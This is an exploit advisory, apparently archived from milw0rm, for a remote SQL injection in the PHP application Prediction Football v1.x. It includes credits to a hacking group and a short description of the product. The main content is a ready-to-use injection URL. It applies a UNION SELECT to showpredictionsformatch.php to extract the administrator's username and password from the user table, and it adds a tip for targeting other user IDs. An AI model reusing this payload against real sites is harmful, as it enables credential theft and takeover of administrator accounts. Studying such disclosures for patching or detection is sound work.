/*
Prediction Football v 1.x Remote SQL INJECTION
Discovered by 0in from Dark-Coders Programming & Security Group.
!!!!!! > http://dark-coders.4rh.eu < !!!!!!
Contact: 0in(dot)email(at)gmail(dot)com
Greetz to all Dark-Coders Group Members: Die_Angel, Sun8hclf, M4r1usz, Djlinux, Aristo89
Script homepage: http://www.predictionfootball.com/
Description: Prediction Football is a program that provides a web based administration
config and automated prediction leagues. This program supports multiple languages. This
script makes predictions simultaneously. This helps you to message other users and capable
of multiple fixture creation. This requires web server with support for PHP4.0 or greater,
MySQL database. Very easy to download and install the program and execute.
*/
Exploit:
http://target.domain/[path]/showpredictionsformatch.php?sid=dupa&matchid=-666/**/union/**/select/**/1,2,3,concat(0x757365723a,username),concat(0x7061737377643a,password),6,7/**/from/**/pluserdata/**/WHERE/**/userid=1/*
userid=1 - admin user have that userid, you can change that to another user.
//EoFF
# milw0rm.com [2008-04-08]
